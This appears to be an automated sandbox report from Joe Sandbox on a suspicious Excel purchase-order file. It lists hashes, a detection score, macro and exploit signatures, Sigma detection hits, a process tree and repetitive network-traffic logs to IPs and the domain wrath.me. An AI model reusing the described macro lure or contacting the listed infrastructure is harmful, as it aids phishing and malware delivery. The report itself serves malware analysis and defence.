Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO20241008.xls

Overview

General Information

Sample name:PO20241008.xls
Analysis ID:1529028
MD5:2f967a802f4b792f40315232d8232cd7
SHA1:6d61ccac86a924e895114e0e9b06ee2185075497
SHA256:5ccf5c84f7c2890c2769eefb521253092d9b5fd73534ebbb8e02acc6858b3684
Tags:xlsuser-abuse_ch
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Excel sheet contains many unusual embedded objects
Machine Learning detection for sample
Document contains embedded VBA macros
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 2436 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • splwow64.exe (PID: 6844 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • EXCEL.EXE (PID: 2632 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\PO20241008.xls" MD5: 4A871771235598812032C822E6F68F19)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Excel Network Connections
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 188.114.96.3, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 2436, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 65437
Sigma detected: Suspicious Office Outbound Connections
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.6, DestinationIsIpv6: false, DestinationPort: 65437, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 2436, Protocol: tcp, SourceIp: 188.114.96.3, SourceIsIpv6: false, SourcePort: 443

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: PO20241008.xlsReversingLabs: Detection: 13%
Machine Learning detection for sample
Source: PO20241008.xlsJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:65437 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.6:65440 version: TLS 1.2
Source: global trafficDNS query: name: 18.31.95.13.in-addr.arpa
Source: global trafficDNS query: name: wrath.me
Source: global trafficTCP traffic: 192.168.2.6:65437 -> 188.114.96.3:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65441 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65438 -> 72.5.42.5:80
Source: global trafficTCP traffic: 192.168.2.6:65437 -> 188.114.96.3:443
Source: global trafficTCP traffic: 192.168.2.6:65437 -> 188.114.96.3:443
Source: global trafficTCP traffic: 192.168.2.6:65437 -> 188.114.96.3:443
Source: global trafficTCP traffic: 192.168.2.6:65437 -> 188.114.96.3:443
Source: global trafficTCP traffic: 192.168.2.6:65437 -> 188.114.96.3:443
Source: global trafficTCP traffic: 192.168.2.6:65437 -> 188.114.96.3:443
Source: global trafficTCP traffic: 192.168.2.6:65437 -> 188.114.96.3:443
Source: global trafficTCP traffic: 192.168.2.6:65437 -> 188.114.96.3:443
Source: global trafficTCP traffic: 192.168.2.6:65437 -> 188.114.96.3:443
Source: global trafficTCP traffic: 192.168.2.6:65437 -> 188.114.96.3:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65441 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65441 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65441 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65441 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65441 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65441 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65441 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65441 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65441 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65437 -> 188.114.96.3:443
Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.6:65437
Source: global trafficTCP traffic: 192.168.2.6:65437 -> 188.114.96.3:443
Source: global trafficTCP traffic: 192.168.2.6:65437 -> 188.114.96.3:443
Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.6:65437
Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.6:65437
Source: global trafficTCP traffic: 192.168.2.6:65437 -> 188.114.96.3:443
Source: global trafficTCP traffic: 192.168.2.6:65437 -> 188.114.96.3:443
Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.6:65437
Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.6:65437
Source: global trafficTCP traffic: 192.168.2.6:65437 -> 188.114.96.3:443
Source: global trafficTCP traffic: 192.168.2.6:65437 -> 188.114.96.3:443
Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.6:65437
Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.6:65437
Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.6:65437
Source: global trafficTCP traffic: 192.168.2.6:65437 -> 188.114.96.3:443
Source: global trafficTCP traffic: 192.168.2.6:65437 -> 188.114.96.3:443
Source: global trafficTCP traffic: 192.168.2.6:65437 -> 188.114.96.3:443
Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.6:65437
Source: global trafficTCP traffic: 192.168.2.6:65438 -> 72.5.42.5:80
Source: global trafficTCP traffic: 72.5.42.5:80 -> 192.168.2.6:65438
Source: global trafficTCP traffic: 192.168.2.6:65438 -> 72.5.42.5:80
Source: global trafficTCP traffic: 192.168.2.6:65438 -> 72.5.42.5:80
Source: global trafficTCP traffic: 72.5.42.5:80 -> 192.168.2.6:65438
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
Source: global trafficTCP traffic: 192.168.2.6:65440 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.6:65440
